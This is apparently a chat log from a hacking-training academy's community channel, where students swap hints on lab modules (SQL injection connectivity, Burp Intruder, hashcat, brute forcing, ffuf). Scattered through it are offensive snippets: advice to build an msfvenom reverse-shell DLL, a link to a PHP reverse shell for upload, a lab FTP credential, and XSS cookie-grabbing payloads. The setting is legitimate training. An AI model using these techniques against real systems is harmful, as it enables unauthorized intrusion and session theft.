#modules

@feral gyro it would be if you could connect. Maybe it's fixed now but I spent a day and a half fighting connection issues.

it's a mysql error u faced

Yes and my command was correct. It just would not connect from my vm or pwnbox. I was told they would fix the problem

do u still remember the error code

It would connect once every 8 to 10 tries

Yes sir.. hang on

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 64.227.39.88 -P 31239 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

└─$ mysql -h 139.59.175.51 -P 31040 -u root -ppassword
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

yep same error u can fix this

I gave up.

just u need to run systemctl restart mysqld

just run this

worked for me

I've rebooted, and get the same error on 3 machines.

try this command

Including theirs

i run this on my vm

IF I decide to try it tomorrow I'll try it

cool

But the fact that I got the same error, on 3 completely different instances tells me the problem was on their end and not mine

but u can solve it

brother

Oh I know I can. I actually have quite a bit of experience with mysql databases. Been using them for more than a decade at work.

I expected to cruise thru this and when it works I do.

cool

well good, looks like it might be fixed.

yep i think so

Maria Maria, she reminds me of the west side story

SO first I have to: "sudo apt-get install libssl-dev" and then "add sudo to make "sudo ./configure && sudo make"

Why hashid didn't worked?

Which module and section is that?

CRACKING PASSWORDS WITH HASHCAT - Cracking Miscellaneous Files & Hashes

By looking at their spreadsheet on supported hashes, 7Zip isn't on the list so I guess it could be a reason

(Source : https://github.com/psypanda/hashID/blob/master/doc/HASHINFO.xlsx)

It's strange since it's so well known.

Yeah, + hashid hasn't been updated for 7 years soooo

Do you advice a newer tool?

I don't know any more recent that does the same job yet, I only use the hashcat website and two others

https://www.tunnelsup.com/hash-analyzer/ & https://hashes.com/en/tools/hash_identifier if I need, but hashcat website is enough most of the time

Thanks. Just tried and only the hashes.com could identify that it is a 7-zip but not the mode.

Yes only Hashcat (afaik) is capable of that

?

Only Hashcat can recognize the mode if I don't make any mistake

the problem is that I have to insert the mode (-m) so... how can I discover it?

https://hashcat.net/wiki/doku.php?id=example_hashes ?

Or I just don't understand your request and I am dumb

oh ok I didnt know it was there. If its there the tools should be able to tell the mode. Next time I will search in the hashcat site. Thanks !

Anytime

Im currently stuck at burp intruder. Here's the task:
"Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag."

Here's what I've done: Sent a GET with /§admin§/, I added the .html as payload and I successfully receive a 200. This is where im stuck, the .html returns 403 forbidden.

on which module

Using Web Proxies -> section Burp Intruder

letme check

cheers

got it

Really? I still havent gotten it to work :p

wordlist u used ?

I only wrote .html and admin in there cause thats what I was looking for?

u need to use /seclists/Discovery/Web-Content/directory-list-2.3-small.txt

this list

as a payload

let me try

And change the request. /$admin$/ is wrong.

admin is static.

ah ok, thanks

burp will take so much time

something more like /admin/$file$.html

if u know ffuf then it will be cool

i don't recommend burp for this question

coz it will take hours

I dont know fuff yet, thats in a later part

But this is a burp exercise??

cool then try burp

im just following the corriculum to learn it all, i dont know whats better. But I can imagine the wordlist search will take forever

am sorry brother

Why would they make such a lengthy exercise when its brand new, just started burp lol

don't use that wordlist brother

stop it now although it is correct

look this

ho i need to check this before

u did this ?

No, just following the conversation...

cool i haven't done this

before

this is all about nos

so u dir name will be like 2.html or 44.html something like this

so u need to craft a wordlist of numbers upto a given length and then start fuzzing

the correct one is in b/w 1 ---> 3000

This is a mess. Ok so I can use a wordlist with 1-3000 then?

tried this but need the number

ok so i found the numbers option

Let me try this...

Im running it by numbers and not sure what to put as request. Trying /admin/§1§.html and then we'll see what happens

yep

that's the reason why i used ffuf

Got it with ffuf already and Burp is just taking ages...

idk if any other method exists

hey dm me the no

fuff im learning longer down the line lol

but this feels way too hard to be introduction to intruder 😦

Nah, it's simple

Really :)

im searching for 1.html, 2.html and so forth now up to 3k

its probably so simple im overlooking it then 😛

You should scroll through the results. And look for 200

still not sure about the request though, what to write there

/admin/§§.html is what i have

yea i included a grep for 200

This is a good exercise for Burp, but terrible for efficiency...

they made it for pro users

Still terrible for efficiency. Why paying for Pro if you can get it with ffuf for free :-P @feral gyro

Well if I get the request wrong I guess I have to do it all over. It feels wrong already

yea but pro has more features

I want to look in the admin directory, but you say I cant use /§admin§/

Anything within $$ is going to get replaced with your payload.

/admin/§file§.html then file is replaced by the number in my wordlist?

but i agree with u @rustic sage

ok i see, that helps 😄

do u need any other hints

try from 1500

Im good to try for myself a bit now, will do from 1500 as I had to redo it again. Thanks a lot for help! Been stuck here for hours

Maybe go to the Positions tab of your running scan and send a screenshot, if you are concerned

ffuf is better coz it is able to filter response codes

same as burp

@dusty timber Looks great. Just double-check that your target machine is still up

Google to <ip>/index.html

I just reset it so it should be enough time now xD
Thanks again @rustic sage and @feral gyro

This should work? Cause it isnt lol

It should return an empty page

ah yea, so its working

IP:PORT/index.html returns blank page

Just a sign your target machine is up

Considering how slow it runs, even from 1500 seems exhausting...

You don't learn anything by waiting an hour for Burp...

yea im only at 1700 right now, so its a good dinner break

Agree!

Most platforms like HTB have a rule for box-creators, that a hashed password should get cracked within 5 minutes or so.

Take your time...

And if you would have used a regular directories wordlist, 100% sure your target would have timed out before you hit the answer. (line number in the 8000s)

Holy smokes

I am considering getting burp pro, just not yet, its "too soon", or it was until this exercise lol

Just to speed things up

Maybe for other kinds of tasks. There are excellent free tools for fuzzing.

yep

wfuzz etc

well I see sql injections is still not responding this morning. It pings until I try to connect then drops. At this rate I will finish the module next year.

same error as yesterday and the night before. ─$ mysql -h 64.227.39.88 -P 31108 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)

try

restarting mysqld

i have

that doesnt magically make the target start pinging

hoo it worked for me

i showed u

and I am telling you I spawn the target, and I cannot ping it or connect

try it now

ho sorry on phone right now

I have tried from pwnbox and a vm

mm

I have rebooted, tried restarting the service, nothing works

send me a screenshot after u run this command systemctl restart mysqld

┌──(kr0w㉿kali)-[~]
└─$ systemctl restart mysqld

┌──(kr0w㉿kali)-[~]
└─$ ping 64.227.39.88
PING 64.227.39.88 (64.227.39.88) 56(84) bytes of data.
^C
--- 64.227.39.88 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2042ms

and pwnbox doesnt have that service

i wish i need to try it now

Which module is this?

@lethal atlas

sql injections

Section?

sql operators

The IP just does not respond

I tried to get help from staff yesterday but someone ( wont blast his name here) was rude and claimed it was fine until I showed him the error then he said they would fix it asap.

it's odd

but earlier one guy also mentioned about this

at that time i found that command

that command doesnt work on pwnbox

lol it finally connected. 14 tries

ho great

never changed my command.

@lethal atlas i fired up the sql injection module on my end cause i wanted to test , i'm also not able to connect to any target

Same here

Thank you for trying. I knew I was not crazy. I legit had to keep trying over and over and over until it finally connects. Then I can finish a section and have to fight the next.

question. I've decided to run a vm on my laptop. Im running VMware player. I'm going trough the getting started module and I'm at the point where it has me set up encrypted LVM. I dont have this option. I downloaded the machine directly from ParrotSec. is this normal?

I dont use parrot so I am not sure how the setup works for it. But I believe that having the LVM encrypted is a good security practice but not absolutely necessary .

yea Im trying to but I don't have that option unfortunately the only options i have are these

is it under advanced options?

no just recovery mode. i gonna redownload everything and see what happens. thanks for responding.

Hey. Did you get any help with this?

your code is incorrect.

if you need help I can assist you

When I input the response for the answer on Hack The Box, it was telling me it was wrong so I assumed it was my code.

You are super close, just some adjustments to some syntax will get you there. DM me if you want

Read through the provided information carefully. Under the description of one of the tools it says it can be used to identify the type of CMS.

why does this command not give any results?

Do you get any output if you run it without the select?

it rints out everything. thats the wierd par the tutorial shows to use the select cn

Have you tried adding "-property *" to the Get-ADObject command?

i have tried that and it would through a massive error.

but now the remote desktop is broken

#613049811481919508 anyone able to explain to me how to find the userAccountControl value set to a specific flag? like i managed to get to the solution by accident but thats not the way to go about this and i would like to learn etc

i figured out it has to do with the bitmask but it doesnt make sense what i foudn to the solution and then the next question is completly different again 😮

Module Web Requests
Section POST Method

Question: Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.

I need help trying to convert get an admin flag from the system

I tried editing the cookie to admin, admin_, admin_xxxx to try and get a response, but it always replied with

Welcome, guest_xxx

The replacements for the cookie I tried were decoded through Base64 into guest_xxxx, changed into one of the mentioned things, then recoded

^Nevermind, I was doing the right thing, it was the server that was down for like 40 minutes that was not working correctly

is there a reason gobuster is spamming me with progress? when i use it its like this long line of progress:..../..... (....%) makes it harder to read the reports

Do you still need help?

.

good morning fellow keyboard jockeys.

Morning sk. How ya be this fine morning?

Little cold here but could be worse.

about to do a shit ton of server upgrades. yay me lol

26 to be exact

thank you for your hints. I finally got it ^^

29 over here lol. I get it.

Someone can help me? , I'm on Login Brute Forcing module on the last part Brute Forcing services I'm stucked doing the lists

On this question?

"Once you ssh in, try brute forcing the FTP login for the other user. You should find another flag in their home directory. What is the flag?"

One before

Pls

Hi guys, on getting started module, public exploit section, I try to get the flag. I identified a well-known CMS running on port provided in the spawn link of question section in the form IP:port. I'm stuck with that. I can't find any related public exploit. Is there any other service I missed out?

You have created a word list william.txt in the lesson "Personalized Wordlists". Try it with this list.

Take a look at the plugins.

Thanks I found it! I'm going to try using the public exploit to get the flag

I have to say, for all the problems I had with the sql injection module, the skills assessment was kind of fun.

Having some trouble with Windows Privilege Escalation - DnsAdmins. I was able to add the netadm to Administrator but I am unable to cat the flag

@slow ruin try using msfvenom to create a reverse shell .dll

I ran into the same problem

So no need to create the adduser.dll and send that over? Create a reverse shell.dll and send that over instead?

yep 🙂

awesome thanks for the hint!!

Anytime dawg!

Hmm, guys i'm doing HTB Academy - Web Requests module. Im in the "POST method" section. And i can't find the flag. Isn't the flag supposed to appear on screen, or in any of the HTTP responses/source code. I completed the challenge, but didn't recieve any flag.
Am i doing it right? I manipulated the cookie, got Admin...and no flags.

If you did all the steps correctly it should give you the flag.

I'll just repeat.

I just tried it and for some reason it didnt work.

and I have detailed notes

It didn't?

So, i guess the problem's not with me...

not sure what changed but I just encoded the cookie again and it worked

Hmm

Well, i'll try again and see if that helps.

i used burp decoder to encode

I didn't use it.

If you used cli base64, then there is something to be careful about

Oh

okay...

No, i didn't use the cli here

when you echo, echo adds a line-break, which also gets encoded

no

that's not it

OK :)

yeah thx for the info tho

DM me so we can discuss in detail

I'll try alone, if i can't i will DM.

adding -n to echo removes that line break and you get the "right" result. just a piece of info :)

@rustic sage that is really good info. Thanks. My notes must have been from CLI since I had a different value than Burp gives.

if i try to use sudo commands in the 'Linux Fundamentals' modules i need to use a password but what is this password i tryed my HTB acc password but that doesn't work pls help (:

@olive void There is a file with credentials on the desktop

credentials.txt or something like that

and password is in their?

There is only one way to found out

hhmmm i can't use Workstation bc i have no spawns left so i wil have to try tmr, thx 👍

If you are going to use pwnbox you will need to look in that file each time as it changes but I recommend setting up your own VM or workstation and using VPN

oo oke thx

Oh, well i just made a typo. That's why it didn't work

🤦‍♂️

Hi, Attacking common application Splunk > Enumerate the Splunk instance as an unauthenticated user. Submit the version number to move on (format 1.2.3) , this is really weird i cant get the version correct any help pls

See Help about

still ...

in "intro to network traffic analysis" the exercises for "Packet Inception, Dissecting Network Traffic With Wireshark" are extremely broken. Using the pwnbox interface, the NoMachine client keeps getting disconnected. I was able to answer the first question with the downloadable files, but the second question about identifying the employee responsible seems to be impossible to do without the live instance

I fought that same issue. I finally managed to limp thru it all after multiple reconnections.

yeah, i was finally able to as well

there were a lot of things with that module that i felt were not good questions

Hello

anyone able to help me with Active Directory LDAP as in the skillz quizz i asks for the former employees OUbut when lisitng all OU it does not show?? am i missing something?

is anyone else having issues with htb docker ip's? i seem to be unable to connect to the ip address given in an academy module

I was having issues with lab vpn last night

Havent tried mods recently tho

i've tried resetting the target, but that only works sometimes

ostensibly i know what i'm doing

oh well, i'm taking a break

I need someone to help me with command Injections > Identifying Filters. The question asks which of the 3 is NOT Blacklisted, and in Burp I get a response using one of the three but when I try any of the 3 as an answer it says im wrong

@lethal atlas DM me brah!

@split sedge DM me bro 🙂

Windows File Transfer Methods 2nd question i'm confused should i do the transfer from linux to windows, windows to windows, windows to linux , i tried the upload methods i thing there is something wrong with the urls

im completely stumped on active subdomain enumeration. i have tried everything and cant seem to figure out question 2. I accidently fat fingered putting the right answer, but for some reason i can only find 1 name server. i have spent 2 days on this and it just makes no sense to me 😦 anyone help me out?

@modest moth is this Information Gathering Web Edition?

yessir

Asking what the number of zones is right?

yea the second question.

i got the answer right but it was an accident. i can dm to keep spoiler free

Sure

Someone has been hacking some boxes

🙂

Trying to get to your level bro!

admin:ftp@dmin123

I'm working on the getting started module. im not sure why it's not connecting. im using ftp@dmin123 as the password

under service scanning section in getting started

@hazy grotto i just took a look at it, the directions say to connect as the Bob user no?

umm ok maybe this is where im confused

i went into ftp and pulled this login info admin:ftp@dmin123

i thoguht bob was just an example

i was following along and the username info was different

lol

ok checkmate

can you explain this file i found?

Probably not, I did this module a while ago lol

i get you are more than likely right. i just want to know why that file was in there and gave different info

I think it might just be serving as an example

connect via anonymous ftp , and find file(s) that contain sensitive data

it's a somewhat common thing in CTF's , to find user credentials in one location and use them later on

well i was able to get it. thank you jared

anytime brother!

Does anyone know if with the annual subscription you get any monthly cubes as well or you have to pay extra if you want to do any of the Tier III/IV modules?

As a subscriber you get a certain amount monthly. If you want to access tiers 3 or 4 you need to up the sub level. If you just buy cubes, you will not earn enough to keep moving without buying more.

Right, the annual subscription says it's the best deal but only says you get instant access to all up to Tier II but doesn't mention any monthly cubes

So I'm guessing for Tiers III and IV you still have to buy extra on top of the annual sub?

Or maybe it's better to just go with the monthly ones and get the monthly cubes...

I guess I didn't look at annual.

Lol

But I have student account and get tier 2 for cheap

I have student account. Do i get monthly cubes?

Nice, yeah, I'm not a student so have to go full price, I really wanna get into it but the complexity of the pricing model is holding me back 😅

no

😭

I have student too, we will be alright

You get cubes when you complete the modules tho

I don't see the advantage of yearly

We should have enough for one 500 cube mod

18 a month is 216

And you get all of tiers 0,1,and 2

Other than a test voucher.

But let's be honest, how many people are really ready for a test after just 1 year unless they have previous experience

How hard is the test?

Are there any modules that are very important that are tier 3/4 ? I just bought linux priv esc

Im not sure, they look interesting but also dont feel like im missing out on too much.

Im thinking about lin privesc or bloodhound

Lin and win priv esc sound good to me but I think if you finish all the others you might be serious enough about it to spend the extra. I mean, the test is not cheap.

I think we might be the first graduation class of htb academy

I wonder if they will have a party for us

Woohoo

Can't wait for the after party

I got the feeling Jared will do some shots

I'm gonna be the stripper

I would prefer not to see that 🤣

you can tip me in cubes

hey i ran into a problem in oopsie starting point ......i ahve to upload a php reverse shell in webpage...i have no clue how to do it ...no explanation in the walkthrough either ...can someone help me?

use the upload on the website and upload this file
https://github.com/BlackArch/webshells/blob/master/php/php-reverse-shell.php
remember to change ip and port, before uploading.

maybe try looking into #starting-point also i recommend payloadallthethings

okay

thank you

@here we will be taking the module 'Web Requests' offline for the next 30 minutes, as we will be releasing version 2.0 of the module.

Hey guys, can someone help me at brute force “skills assessment - website” module?

sure can

Sent ya pm

@here The version 2.0 of the Web Requests module has been released, with entirely new content.
If you have fully/partially completed the module previously, you will not lose your progress, but you may still find it interesting and beneficial if you decide to take the new module.
The module is a 'tier 0' module, so anyone may take for free.

Thanks, Might have to check that out. Do you know if there are plans to work on the SQL injection module?

do think it needs a remake or some enhancements? or are you looking for future sqli modules?

It has had a LOT of connectivity issues the last few days. Others here have confirmed the same errors I was getting .

It was mainly in the SQL injections section. Took me 2 days to get thru it. The skills assessment section didnt give me any issues though.

AND, btw I loved the skills assessment.

we have some big things the works that are taking precedence right now but we are working through updates to many of the older modules (File Inclusion, Hashcat, Linux Priv Esc, BloodHound, etc.) We are committed to quality content and an enjoyable learning experience for all on our platform and we are constantly evolving, improving, enhancing our procedures. we value each of our students and your opinions greatly as the platform would not exist without your support so always feel free to reach out to any of our team or to me directly with feedback, bugs, errors, requests, etc. know that we do read and discuss every bit of feedback we receive through various mediums and the best is yet to come!

yeah we're working on these connectivity issues as well, so they should be fixed soon

I just want the entire Hackthebox team to know that your hard work is appreciated. I have tried other platforms to learn and Academy is by FAR the best imho. I have enjoyed the modules, even with the occasional issues and feel that the method employed has helped me to understand and build. Keep up the good work and forgive an old grumpy guy like me who gets frustrated from time to time. 😄

thank you. that means a lot. we write with passion and try to incorporate our own experience into the module sections with stories, tips, etc. its a fun but challenging process. and I can assure you I am older and grumpier 🙂

Just curious, How old are you? I am about to turn 52

oh then you win. I'm 36. crazy I've been doing some sort of IT work for half my life now

Same. I got into wireless internet in 1999 and have worked for ISP's up until 2 years ago. I got too old to climb towers so I took a desk job doing IT for a small college. I have always wanted to be in net sec so I started trying to learn. Glad I found HTB.

wow that's an awesome journey. I started out in a small office doing stuff like crawling under people's desks to install UPS devices, upgrading ram and OSs etc

crazy where life takes us my friend.

hello i need some help

i am on module getting started on the section knowledge check

i am using gobuster to find extensions of the ip

but i cant load the main website

should it look like this?

Yes it appears the page is loading properly. If you are just fuzzing for files/directories then it really shouldn't matter what the page "looks like" if that makes sense

ok

i have stuck and i dont know what should i do now

that "lorem ipsum" is just placeholder text used for websites

before the host was /nibbleblog but i cant find something now

@west canopy do you know what should i do now?

Gimme a sec ill take a look at it on my end

i tried to reach them but i didnt find something usefull

What section is this?

knowledge check

under whats next

the last one

ok i see it

i did this a while ago and didn't take any notes. I think i ended up using metasploit on this section

ok because i have to do with my classmates some homework

i will be back at 9

I didn't take very good notes back then either

I take crazy detailed notes now

same bro

have cherrytree all pimped out lol

your cherry tree has a gold chain

and tooth

lol

@rustic sage just sent you a DM showing what to do brother 🙂

Hello, doing the Getting Started module and im currently on Public Exploits. When I spawn the target box and run nmap on it I get "host seems down". What should I do?

@dry girder try adding the -Pn option

"nmap -h" -Pn tests all ports as open regardless

Thank you @west canopy @lethal atlas

Yea i think nmap typically tries to ping the target first before sending its probes, -Pn disables host ping

and is it normal if it takes a lot of time. The last box I ran nmap with -sV and -sC flags was done really fast. I tried running without the flags (only with -Pn) but got nothing useful just that the ports are in ignored state

Yes when you use -Pn , nmap actually tells you that "All addresses will be marked up and scan times will be slower"

man I just looked at my notes on getting started. Or should I say complete lack thereof

I might have to go back and do it again

You guys ready for the new easy box to drop tomorrow?

my body is ready

If I wasn't super busy tomorrow I would be

just finished helping someone with that Brute Forcing module. Thats VivisGhosts favorite

have you considered adding a module about hardware?

ls

whoami

<script>alert(‘xss’)</script>

Hi community, I'm taking Broken Authentication, weak Bruteforce protections, second question

Some help?

@surreal rain sketch

Thanks

Module --> WEB REQUESTS
Section->> PUT & DELETE
If you go down to the PUT section, there is a typo, it is repeated twice:
nosoybek@htb[/htb]$ curl -s nosoybek@htb[/htb]$ curl -s http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City | jq

[
{
"city_name": "New_HTB_City",
"country_name": "HTB"
}
]

@HTB Academy

Hello

i am having some problems

i am on module :ATTACKING WEB APPLICATIONS WITH FFUF

i should get something like this

but i get:

on which section

i am on : sub-domain fuzzing

let me check

kk i am holding

working for me

let me restart the machine again

is this what you typed : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/ ?

@feral gyro

nope am on my vm

yea what did you typed?

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/ -v

ok let me see

-fs 403

can you type me the command that you used

@feral gyro bro

anyone else?

same one

I seem to be missing something in the "hacking wordpress" module. in the skills assessment, the question "Submit the contents of the flag file in the directory with directory listing enabled." i found two places where directory listing is enabled, but no flag file

nvm

too far in rabbit hole

try http instead of https

but it's the actual one with https

not the spawned one

where does it say that?

it's on subdomain enumeration

on the ffuf module

I know, and nowhere does it say https

1. HackTheBox has an online Swag Shop. Try running a sub-domain fuzzing test on 'hackthebox.eu' to find it. What is the full domain of it?

but i think htb is having an https one instead of http

although it works either way

I just ran with both and got the answer

what about accessing it via the browser

is it http on https

or it is changing automatically

it changes it automatically but it doesnt matter.

ffuf -w /usr/share/secLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.hackthebox.eu worked

mm but the problem he faced is due to the wordlists

and https

but u said to try http although it doesn't really matter

I just know that sometimes trying http or https over the other works.

I guess I should read closer. I thought you were the one having the issue. lol

figure it out?

mm

well if everyone is doing good I am gonna go finish Command Injections

Search also in subdirectories

need some help with Login Brute Forcing skills assessment-website. i got the first flag and im trying to brute force the admin login form. having some trouble getting results. I think i might be messing up the fail string because i get a bunch of user name and password matches.

@rustic sage feel free to DM me 🙂

Short question in the Linux modules. Has anyone any idea how I can look for that? I tried with apt list and than I pipped it in to wc but than seems to not working

@opal vapor try doing something like: dpkg -l | grep -c 'ii'

im having problems

with a module

on htb

Which module?

Hi all, i am in the information gathering module and i am currently on the virtual host portion.

At the assesment part it says "vHosts needed for these questions"

Do i point the ipaddress that is spawned to www.inlanefreight.htb in /etc/hosts

@modest moth yes, once you discover a vhost you will need to add it to /etc/hosts in order to navigate to it in your browser

i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"

i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back

ugh..nvm. i'm just an idiot

we all are

once a day

guys

can i ask you something

i am on module : File Inclusion / Directory Traversal

Getting started module:
Web Enumeration

I was given a IP Address with 64.227.39.89:30672 I went through the whole module with it working up until the Certificates part and it asks this.

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

This is a different IP address than the given target and is doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.

When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.

I only get on ping back and nothing in return

on the section: Local File Inclusion

or a repeating ping

Can anyone steer me?

i just finished getting started

what do you need?

I'm trying to view the certificate like in the module but it times out

are you using vm?

pwnbox on this website

oh ok

what is the question ?

Why can't i view the certifcate

and under the robots.txt section. I try navigating to the /private url and i never get anything

idk what im doing wrong

whats do you have to do send me a screenshot

did you tried to restart the target and your pwnbox?

which section are you on?

@hazy grotto

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

Web Enumeration

First web enum, scroll down to Certificates

ok

let me see

This is the 3rd time ive had a new IP

I tried twice 2 hours ago and now again.

Idk if its because Im not understanding something but i was following along step by step

which command are you using?

I'm trying to enter the IP into the URL

https://<target_ip>/

this ?

yes

and send me a pic of your result

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

This is a different IP address than the given target and is doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.

When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.

I only get on ping back and nothing in return

send me a screenshot bro

try whatweb <ip>

basically to lead to the question you dont need to go to certificate page

@hazy grotto I believe they are talking about the SSL/TLS Certificate as just an extra tidbit of information.

oh good

can try to move to the next one?

right but i would just like to see the end result but it times out

It's not an HTTPS website so there is no certificate

lol

jared

i think i owe you a frosty drink

because im stupid

Can i have a frosty

Pleaaaaaaaaase

@raven cairn GET YOUR OWN FROSTIE

i don't think you are old enough

😭NOOOOOOOOO!!!!

You look pretty young

you can have some Barq's rootbeer

Is frosty alcohol?

soda pop

I thought is was the thing at wendy’s 😋

lol

frosty means cold

but i know what you are talking about

Dairy Queen for ice

Dairy queen has the best ice cream ever

i dont know what chemicals they use , but i want more of them

Agreed

You guys think this is timing you because of my slow internet?

Try adding the port to the URL in your gobuster scan

nvm i had done that jared

then took the port off

got a fourth ip and it's working now. with the port like you said

hey jared can i dm you?

sure

could you point me in the right direction?

Well I managed to find the right piece of the puzzle, but it was dumb luck. I don't understand why a file even existed at that directory

So the Firewall & IDS/IPS Evasion: Medium Lab is giving me a headache. I don't think to get the DNS service requires using nmap as sudo right?

@round lagoon DM me if you need a nudge 🙂

hey anyone online not busy that can help with login brute forcing? having some issues with ssh

found a working u.name/pass pair but can seem to ssh

nvm im blind.

Anyone mind providing some guidance on Getting Started > Public Exploits? I've worked it all the way to setting up the exploit in MS

finally done with the login brute forcing module!!!

Nice work 🙂

thanks. took me longer that care to admit but im glad i stuck with it. Thanks for the help @west canopy

@floral scroll feel free to DM me bud!

Maybe because an administrator forgot them there? i don't know.

Hi all any help on the getting started module knowledge check?

I found the version of the content management system but i dont know what to set the things to in metasploit. I know Rhosts is set to the target IP however, i dont know what to set the TARGETURI to, please nudge me or hint me as to what to set that to. im trying to gain an initial meterpreter session.

@modest moth this is the GetSimpleCMS right?

I believe you can leave the TargetURI as default

alright thanks, will try it out

@west canopy thanks again! guess i was doign everything right i just was stressing over the URI haha. will try to do the exploit without the metasploit now.

Doing the footprinting module and need sudo to be able to run mount for NFS but don't know where to find the pwnbox password to run sudo - anyone know?

it's on the desktop

Thanks 🙂

little confused on how i do the "connect to htb" i selected the pwnbox option it loads for a few seconds and still says offline

Are you a subscriber.
If not, you can have only one pwn box per day.

hi to all/ Who can help me with module Cross-Site Scripting (XSS) - 'Try to use XSS to get the cookie value in the above page' I can't figure out what the link should look like. There is no example in the module itself, there is only a phrase that the task is similar to the previous module. But I don't have enough knowledge.

this is pyload - #"><img src=/ onerror=alert(document.cookie)>

How to insert it into the link? I'm not familiar with the syntax at all

Can someone give me a hint. I have tried out ls -al /var/log and top | grep ProFTPdbut that dosen't worked.

http://64.227.39.89:30702/index.php?task=

u need to add the payload after this

It's part of the Linux module

Thank you so much!!!!

Anyone tell me how i start learn hacking

try ps -aux | grep process_name

Hii

@azure monolith Hackthebox Academy is a good place to start. Start with some of the fundamental modules.

Suggest any corse

Learning process
Intro to Academy
Linux Fundamentals
Introduction to networking
Web Requests
Intro to web applications
Getting started

I would highly recommend Linux fundamentals if you are not comfortable in a linux terminal

Thanks

@azure monolith If you try a question and get stuck for a bit, we can help you out over here 😁

@azure monolith I’d recommend Linux Fundamentals and then practice Linux terminal skills using OvertheWire war games, starting with Bandit: https://overthewire.org/wargames/

Hello people, I am having trouble with Firefox, it not be the right place to discuss but please help me. I have tried most of the commands, seen videos, nothing is helping.

@cobalt rose What kind of trouble are you having?

i was just going through a course. and i had to take the interface down and i did that, i thought trying to confirm if thats really happend. and i opened up the browser and then i get the erro having trouble finding that site.

Are you using a VM? I take it you've tried commands to stop and restart the interface.

yes sir i am using VM.

Personally I've had issues with my Kali VM. I used to keep it on Bridged Adapter then one day the network interface just died and I couldn't pull an IP address. So i just ended up rolling it back to an old snapshot and setting it as NAT.

I'm sure you've already tried this, but I would probably just google and try any command possible that might restart the interface. If that doesn't work then I would just restore it back to an older snapshot. Wish I had a better answer for you dawg 😦

yes sir i have tried changing it from bridged netw to nat and vice versa. yes sir thanks a lot for the help. i will try to restart the interface and other things.

Is there any one available to help with a module?

Possibly, which module?

Network enumeration with nmap, nmap scripting engine

DM me 🙂

yo can anyone help with the Ffuf module?

@rustic sage I got you bruh!

wordcan i dm you?\

of course

I'm doing the Fundmentals of Active Directory and I have no Idea what is going on

I am passing the questions but all this stuff is going over my head 😭

How do I learn more about AD???

Any good advice?

I'm doing information gathering module section active subdomain enumeration, I'm really not sure how to find more zones, I have found 22 unique subdomains on the first zone, but I'm stuck, any help?

Look at the hint.
"There are several zones

Yes but how can I find them?

I only know how to query the inlanefreight.htb

try bash scripting

ok thanks

Can I DM you about an earlier question in that module?

@rustic sage yes ^^

Hi FeatherKnight, I have been stuck here a bit too. There are 2 exploits that can be used to exploit the GetSimple platform. Both of them having the default TargetURI work so you do not need to change that.

Yea I got it figured out! I was over thinking it. It was a mix of me thinking I needed to fill it out and the machine expiring lol.

Nice! Have you figured out the second part for priv escalation? I am CRAZY stuck there.

Hello all, I have a noob question about using cURL to search for flag through JSON POST request to search.php. I just started with HTB and it seems as if I just got lucky to locate flag on previous modules. Any help will be appreciated.

Yea, I got it done. If you want dm me and I can nudge you in the right direction

by the way, it is the Web Request module

hey so i started the beginner module for https and i cant even answer the first question "+ 1 To get the flag, use cURL to download the file returned by '/download.php' in the above server." i used up all 120 min and had no idea what do do i kind of just clicked things and stared at the background any help what to do or just give me the answer and i will work backwards

on which section

http fundamentals the very first one

quite simple

just use curl

but i dont understand what the question is even asking of me

like what doest it want

http://ip/download.php

use curl to get the flag

arnt flags given

arent they like -0 -o -s

no flags needed

just curl http://ip/download.php

ok i will try whenever i get another free instance

means

im still really confused because the question says to get the flag

yep

so where do i type curl http....

when u use curl u will get the flag as the output

on terminal

and i get there how?

to the terminal

open the linux terminal and then run the curl command

yea when i started the instance i just got a blue background with some files

but where do i click to see the terminal

ahhh ty so much i will try tomrrow or something

Random resource - Online textbook

https://www.cybok.org/knowledgebase1_1/

Sup folks ! Could anybody help me on Skills Assessment from Using Web Proxies ? I'm on the third task. I've in many different ways to save the question, trying with burp and zap.

Have you done that module? I would like to ask you something about it

Yes of course you can ask

I can help with that

Who can help with Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. in the Information Gathering module???

